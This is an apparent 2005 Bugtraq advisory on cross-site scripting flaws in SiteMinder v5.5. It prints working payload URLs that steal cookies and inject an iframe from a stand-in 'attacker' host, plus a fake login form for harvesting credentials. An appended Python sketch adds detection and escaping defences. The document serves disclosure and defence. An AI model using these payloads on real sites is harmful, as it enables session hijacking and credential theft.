List: bugtraq
Subject: SiteMinder Multiple Vulnerabilities
From: c0ntexb () gmail ! com
Date: 2005-07-08 14:03:11
Message-ID: 20050708140311.20979.qmail () securityfocus ! com
/*
*****************************************************************************************************************
$ An open security advisory #10 - Siteminder v5.5 Vulnerabilities
*****************************************************************************************************************
1: Bug Researcher: c0ntex - c0ntexb[at]gmail.com
2: Bug Released: July 08 2005
3: Bug Impact Rate: Medium / Hi
4: Bug Scope Rate: Remote
*****************************************************************************************************************
$ This advisory and/or proof of concept code must not be used for commercial gain.
*****************************************************************************************************************
Siteminder
http://www3.ca.com/Solutions/Product.asp?ID=5262
"eTrust™ SiteMinder® is a market-leading, security and management foundation for enterprise Web applications with a centralized security infrastructure for managing user authentication and access. eTrust SiteMinder delivers the market’s most advanced security management capabilities and enterprise-class site administration, reducing overall IT operational cost and complexity. eTrust SiteMinder enables the secure delivery of essential information and applications to employees, partners, suppliers and customers, and scales with growing business needs."
Siteminder is vulnerable to cross-site scripting (XSS): an attacker can append HTML or JavaScript to various locations in a URL or input field and have the script execute in the victim's browser. This can be used to perform phishing attacks, hijack the user's browser session, or capture account credentials by redrawing the login page of the site.
http://vuln/siteminderagent/pwcgi/smpwservicescgi.exe?SMAUTHREASON=0&TARGET=&USERNAME=hacker&PASSWORD="><script>alert(document.cookie)</script>&BUFFER="><script>alert("Vulnerable")</script>
The following link abuses the TARGET URL parameter. It first logs the user out of the site with a timeout error (because she is sent off to another HTTPS site), which returns her to the login page. It then opens an IFRAME over the original login fields containing attacker-controlled Username and Password inputs, so that the user supplies her login details to a malicious site, where they are harvested and used in a later attack.
http://site.com/siteminderagent/forms/login.fcc?TYPE=1&REALMOID=01-000000000-000000-0010-0000-0000000000000&GUID=&SMAUTHREASON=32&TARGET=http://site.com/servlet/yum/eat/user.html"><iframe bgcolor="white" src="https://attacker/snoop.html" style="position: absolute; top: 270px; left: 15 px;"></iframe><iframe src="https://attacker/snoop.html" style="position: absolute; top: 270px; left: 15 px;"></iframe>
To test whether you are vulnerable to this issue, append the following to the end of a Siteminder URL. If it is successful, you should see the Google homepage within an IFRAME.
"><iframe bgcolor="white" src="http://www.google.com" style="position: absolute; top: 270px; left: 15 px;"></iframe><iframe src="http://www.google.com" style="position: absolute; top: 270px; left: 15 px;"></iframe>
/* snoop.html */
<html>
<head></head>
<body>
<form>
User ID
<input type="text" name="UserID">
<br>
Password:
<input type="text" name="Password">
<input type="submit" value="Submit">
</form>
</body>
</html>
I have contacted Netegrity via ca.com multiple times but received no response. As such, users should use a filtering technology like modsecurity to detect the above-described attacks until a fix has been released.
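As an added illustration of the filtering and output-encoding the advisory points at (this is not the author's code and not part of the SiteMinder product), the following Python sketch does three things a defender would want: a request-filter check in the spirit of the modsecurity suggestion that flags reflected parameters carrying markup, a hardened renderer that HTML-escapes every reflected value (quotes included, so the `">` attribute break-out above cannot occur), and an allow-list check for the TARGET redirect so it can only point at the site's own hosts. The parameter names come from the advisory's own URLs; the function names, the allowed-host set and the sample requests are constructed for this example.

```python
import html
import re
from urllib.parse import parse_qsl, urlsplit

# Parameters the advisory shows being reflected into the login page
# (constructed list for this example; a real deployment may reflect others).
REFLECTED_PARAMS = ("USERNAME", "PASSWORD", "BUFFER", "TARGET")

# Filter rule: a quote or angle bracket lets a value escape an attribute or
# open a tag; javascript: URLs and on*= handlers cover the remaining cases.
INJECTION_RE = re.compile(r'["\'<>]|javascript:|on\w+\s*=', re.IGNORECASE)


def detect_injection(url: str) -> list[tuple[str, str]]:
    """Return (PARAM, offending_token) for each reflected parameter that
    carries markup. An empty list means the request passes the filter."""
    findings = []
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        if name.upper() in REFLECTED_PARAMS:
            match = INJECTION_RE.search(value)
            if match:
                findings.append((name.upper(), match.group(0)))
    return findings


def render_login_form(username: str, target: str) -> str:
    """Hardened rendering: every reflected value is escaped with quote=True,
    so '"' becomes '&quot;' and cannot terminate the value attribute."""
    return (
        '<form method="post" action="/login">'
        f'<input type="text" name="USERNAME" value="{html.escape(username, quote=True)}">'
        f'<input type="hidden" name="TARGET" value="{html.escape(target, quote=True)}">'
        "</form>"
    )


def is_safe_redirect_target(target: str, allowed_hosts: set[str]) -> bool:
    """Accept only site-relative paths (not protocol-relative //host) or
    http(s) URLs whose host is on the allow list."""
    parts = urlsplit(target)
    if not parts.scheme and not parts.netloc:
        return target.startswith("/") and not target.startswith("//")
    return parts.scheme in ("http", "https") and parts.netloc.lower() in allowed_hosts


# Constructed sample requests: one benign, one using the advisory's pattern.
BENIGN_URL = (
    "http://site.example/siteminderagent/pwcgi/smpwservicescgi.exe"
    "?SMAUTHREASON=0&TARGET=/home&USERNAME=alice&PASSWORD=s3cret"
)
PAYLOAD_URL = (
    "http://site.example/siteminderagent/pwcgi/smpwservicescgi.exe"
    '?SMAUTHREASON=0&TARGET=&USERNAME=hacker&PASSWORD="><script>alert(document.cookie)</script>'
    '&BUFFER="><script>alert("Vulnerable")</script>'
)

if __name__ == "__main__":
    print("benign :", detect_injection(BENIGN_URL))
    print("payload:", detect_injection(PAYLOAD_URL))
    print(render_login_form('"><script>alert(1)</script>', "/home"))
    print(is_safe_redirect_target("https://attacker.example/snoop.html", {"site.example"}))
```

The filter is a stop-gap of the kind the advisory recommends; the durable fix is the output encoding in `render_login_form`, which neutralises the injection regardless of which parameter is reflected, plus the redirect allow-list, which removes the open-redirect half of the phishing chain.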